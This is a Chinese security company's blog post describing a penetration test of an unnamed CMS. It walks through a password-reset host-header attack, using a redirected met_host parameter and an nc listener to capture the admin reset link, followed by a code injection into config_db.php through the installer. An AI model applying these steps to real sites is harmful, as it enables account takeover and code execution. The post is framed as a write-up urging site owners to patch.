当前位置:首页 > 新闻动态 > 网站文章

记对某cms的渗透测试icon

来源: 浏览:134 时间:2023-09-23
某日闲来无事,又朋友说某CMS平台又报出漏洞了。虽然这个漏洞很早之前就存在了,但是仍有很多的网站没有更新!通过本次的测试,望能够引起站长们的注意。及时更新补丁!!
管理员密码重置漏洞
首先,我们访问目标后台https:///xxxx.com/admin/admin/login/login.php一顿 666666走起,万一成功进入后台呢?
点击忘记密码
这里需要管理员的邮箱,那么问题来了。怎样获取到管理员的密码呢?有两个个思路提供参考:思路一: 查看网站的联系方式,里面有相应的邮箱。(但有可能是非管理员账号)思路二:通过站长工具域名反查,获取管理员邮箱。(建议用这个,一般管理员在搭建站点时,用的时自己的邮箱账号。)
怎样判断邮件的正确性
如:我们随便输入一个邮箱,会提示没有找到邮箱,证明邮箱错误。
若提示发送成功,或者失败则证明邮箱正确。
抓包
在确定好邮箱之后,便可以用burp抓包。
在kali虚拟机上监听80端口
nc -lvvp 80
在burp repeater中构造http请求发送
POST/admin/admin/getpassword.php?met_host=192.168.123.6因为目标时外网,而kali是内网。所以需要端口转发!发送构造的请求,在终端中成功获得修改密码的链接。
打开链接效果
修改密码后成功登录后台
Getshell
对其installindex.php代码审计发现
$config=""; $fp=fopen("../config/config_db.php",'w+'); fputs($fp,$config); fclose($fp); $db = mysql_connect($db_host,$db_username,$db_pass) or die('连接数据库失败: ' . mysql_error()); if(!@mysql_select_db($db_name)){
在填写数据库的步骤的时候写入*/phpinfo()/*
访问http://xxxx.com/config/config_db.php
总结
本次测试的环境,相对来说漏洞比较旧。不过在学习中体验乐趣也是不错的选择

地址 · ADDRESS

地址:建邺区新城科技园嘉陵江东街18号2层

邮箱:309474043@qq.Com

点击查看更多案例

联系 · CALL TEL

400-8793-956

售后专线:025-65016872

业务QQ:309474043    售后QQ:1850555641

©南京安优网络科技有限公司 版权所有   苏ICP备12071769号-4  网站地图